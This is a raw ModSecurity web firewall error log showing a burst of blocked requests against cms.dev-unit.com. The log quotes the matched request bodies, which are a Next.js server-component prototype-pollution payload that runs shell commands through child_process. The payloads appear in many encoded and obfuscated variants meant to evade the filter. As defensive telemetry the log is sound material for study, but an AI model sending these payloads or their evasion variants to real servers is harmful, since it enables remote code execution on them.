trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/cart"] [unique_id "adJmzT-XKUNJEHmNu6G7wgAAAIc"] [Sun Apr 05 15:42:37.763628 2026] [:error] [pid 1503:tid 1517] [client 172.94.9.253:44432] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/cart"] [unique_id "adJmzUI7AjfUQYCN-J7DswAAAMg"] [Sun Apr 05 15:42:37.855600 2026] [:error] [pid 13019:tid 13258] [client 172.94.9.253:44480] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/cart"] [unique_id "adJmzbxQSOrq_iRTM7dp9AAAARI"] [Sun Apr 05 15:42:37.856007 2026] [:error] [pid 13019:tid 13251] [client 172.94.9.253:44462] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/search"] [unique_id "adJmzbxQSOrq_iRTM7dp9QAAAQs"] [Sun Apr 05 15:42:37.856419 2026] [:error] [pid 13019:tid 13246] [client 172.94.9.253:44506] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/search"] [unique_id "adJmzbxQSOrq_iRTM7dp9gAAAQY"] [Sun Apr 05 15:42:37.856767 2026] [:error] [pid 31198:tid 31253] [client 172.94.9.253:44522] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/en"] [unique_id "adJmzTT5TgrBR8xRnfXA-wAAAUE"] [Sun Apr 05 15:42:37.857768 2026] [:error] [pid 13019:tid 13242] [client 172.94.9.253:44498] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/cart"] [unique_id "adJmzbxQSOrq_iRTM7dp9wAAAQI"] [Sun Apr 05 15:42:37.869572 2026] [:error] [pid 13019:tid 13245] [client 172.94.9.253:44516] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/dashboard"] [unique_id "adJmzbxQSOrq_iRTM7dp8wAAAQU"] [Sun Apr 05 15:42:37.872559 2026] [:error] [pid 1503:tid 1527] [client 172.94.9.253:44514] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/cart"] [unique_id "adJmzUI7AjfUQYCN-J7DtAAAANI"] [Sun Apr 05 15:42:37.873300 2026] [:error] [pid 23077:tid 23103] [client 172.94.9.253:44490] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/cart"] [unique_id "adJmzZc83uMXRUE9zvQTGAAAAdQ"] [Sun Apr 05 15:42:37.873498 2026] [:error] [pid 1503:tid 1525] [client 172.94.9.253:44474] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/cart"] [unique_id "adJmzUI7AjfUQYCN-J7DtQAAANA"] [Sun Apr 05 15:42:37.923873 2026] [:error] [pid 23077:tid 23098] [client 172.94.9.253:44534] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/en"] [unique_id "adJmzZc83uMXRUE9zvQTGQAAAc8"] [Sun Apr 05 15:42:37.960081 2026] [:error] [pid 13019:tid 13258] [client 172.94.9.253:44606] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/users"] [unique_id "adJmzbxQSOrq_iRTM7dp-QAAARI"] [Sun Apr 05 15:42:37.960111 2026] [:error] [pid 23077:tid 23096] [client 172.94.9.253:44538] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/search"] [unique_id "adJmzZc83uMXRUE9zvQTGgAAAc0"] [Sun Apr 05 15:42:37.960290 2026] [:error] [pid 1309:tid 1394] [client 172.94.9.253:44602] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/search"] [unique_id "adJmzT-XKUNJEHmNu6G7xAAAAJc"] [Sun Apr 05 15:42:37.960607 2026] [:error] [pid 31198:tid 31269] [client 172.94.9.253:44614] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/search"] [unique_id "adJmzTT5TgrBR8xRnfXA_AAAAVE"] [Sun Apr 05 15:42:37.960933 2026] [:error] [pid 23077:tid 23107] [client 172.94.9.253:44600] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/search"] [unique_id "adJmzZc83uMXRUE9zvQTGwAAAdg"] [Sun Apr 05 15:42:37.961615 2026] [:error] [pid 1503:tid 1520] [client 172.94.9.253:44560] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/search"] [unique_id "adJmzUI7AjfUQYCN-J7DtwAAAMs"] [Sun Apr 05 15:42:37.961687 2026] [:error] [pid 23077:tid 23089] [client 172.94.9.253:44576] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/search"] [unique_id "adJmzZc83uMXRUE9zvQTHAAAAcY"] [Sun Apr 05 15:42:37.975602 2026] [:error] [pid 1306:tid 1324] [client 172.94.9.253:44592] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] 